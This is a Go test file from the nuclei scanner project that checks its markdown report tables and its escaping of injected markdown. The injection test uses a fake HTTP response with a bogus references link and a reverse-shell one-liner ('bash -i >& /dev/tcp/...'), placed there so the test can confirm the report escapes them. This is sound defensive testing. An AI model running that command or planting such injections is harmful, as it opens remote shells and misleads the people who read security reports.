GitHub Repository: projectdiscovery/nuclei
Path: blob/dev/pkg/reporting/format/format_utils_test.go
package format
import (
"fmt"
"strings"
"testing"
"github.com/projectdiscovery/nuclei/v3/pkg/model"
"github.com/projectdiscovery/nuclei/v3/pkg/model/types/severity"
"github.com/projectdiscovery/nuclei/v3/pkg/model/types/stringslice"
"github.com/projectdiscovery/nuclei/v3/pkg/output"
"github.com/projectdiscovery/nuclei/v3/pkg/reporting/exporters/markdown/util"
"github.com/stretchr/testify/require"
)
// TestToMarkdownTableString checks that CreateTemplateInfoTable renders the
// well-known template attributes as a markdown table in a fixed order, followed
// by the Metadata entries (whose order is not fixed) and a trailing newline.
func TestToMarkdownTableString(t *testing.T) {
	metadata := map[string]interface{}{
		"customDynamicKey1": "customDynamicValue1",
		"customDynamicKey2": "customDynamicValue2",
	}
	templateInfo := model.Info{
		Name:           "Test Template Name",
		Authors:        stringslice.StringSlice{Value: []string{"forgedhallpass", "ice3man"}},
		Description:    "Test description",
		SeverityHolder: severity.Holder{Severity: severity.High},
		Tags:           stringslice.StringSlice{Value: []string{"cve", "misc"}},
		Reference:      stringslice.NewRawStringSlice("reference1"),
		Metadata:       metadata,
	}

	rendered := CreateTemplateInfoTable(&templateInfo, &util.MarkdownFormatter{})
	lines := strings.Split(rendered, "\n")

	// Header plus the well-known attributes: these always come first and in
	// exactly this order.
	orderedRows := []string{
		"| Key | Value |",
		"| --- | --- |",
		"| Name | Test Template Name |",
		"| Authors | forgedhallpass, ice3man |",
		"| Tags | cve, misc |",
		"| Severity | high |",
		"| Description | Test description |",
	}
	// Metadata rows come from a map, so their relative order is not asserted.
	// The final "" is the empty segment left by the trailing newline of the
	// rendered table.
	metadataRows := []string{
		"| customDynamicKey1 | customDynamicValue1 |",
		"| customDynamicKey2 | customDynamicValue2 |",
		"",
	}

	// Everything before the last len(metadataRows) lines must match in order;
	// the tail only needs the same elements.
	splitAt := len(lines) - len(metadataRows)
	require.Equal(t, orderedRows, lines[:splitAt])
	require.ElementsMatch(t, metadataRows, lines[splitAt:])
}
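// TestCreateReportDescription_MarkdownInjection verifies that markdown control
// sequences carried inside the raw HTTP response (a closing code fence, a fake
// "References" section and a shell code block) are not rendered verbatim into
// the report produced by CreateReportDescription.
func TestCreateReportDescription_MarkdownInjection(t *testing.T) {
	// A result event whose response body carries markdown that, if emitted
	// unescaped, would close the surrounding code fence and add its own
	// sections to the report.
	event := &output.ResultEvent{
		TemplateID: "test-template",
		Host:       "example.com",
		Matched:    "https://example.com/vulnerable",
		Type:       "http",
		Info: model.Info{
			Name:           "Test Template",
			Authors:        stringslice.StringSlice{Value: []string{"researcher"}},
			SeverityHolder: severity.Holder{Severity: severity.High},
			Tags:           stringslice.StringSlice{Value: []string{"test"}},
		},
		Request:     "GET / HTTP/1.1\r\nHost: example.com\r\n\r\n",
		Response:    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html><body>Hello, world\r\n\r\n```\r\n\r\nReferences:\r\n- https://rce.ee/pwned\r\n\r\n**CURL command**\r\n```sh\r\nbash -i >& /dev/tcp/10.0.0.1/4242 0>&1\r\n```\r\n</body></html>",
		CURLCommand: "curl -X GET https://example.com",
	}

	result := CreateReportDescription(event, &util.MarkdownFormatter{}, false)
	// Dump the rendered report only under -v so a plain `go test` stays quiet.
	if testing.Verbose() {
		fmt.Println(result)
	}

	// Assert on LF-normalized text. The payload uses CRLF, and a formatter that
	// rewrites line endings would otherwise make CRLF-only substring checks pass
	// even when the injected markdown was rendered verbatim.
	normalized := strings.ReplaceAll(result, "\r\n", "\n")
	injected := []string{
		"```\n\nReferences:\n- https://rce.ee/pwned",
		"```sh\nbash -i >& /dev/tcp",
	}
	for _, payload := range injected {
		require.NotContains(t, normalized, payload, "injected markdown must not be rendered verbatim: %q", payload)
	}
}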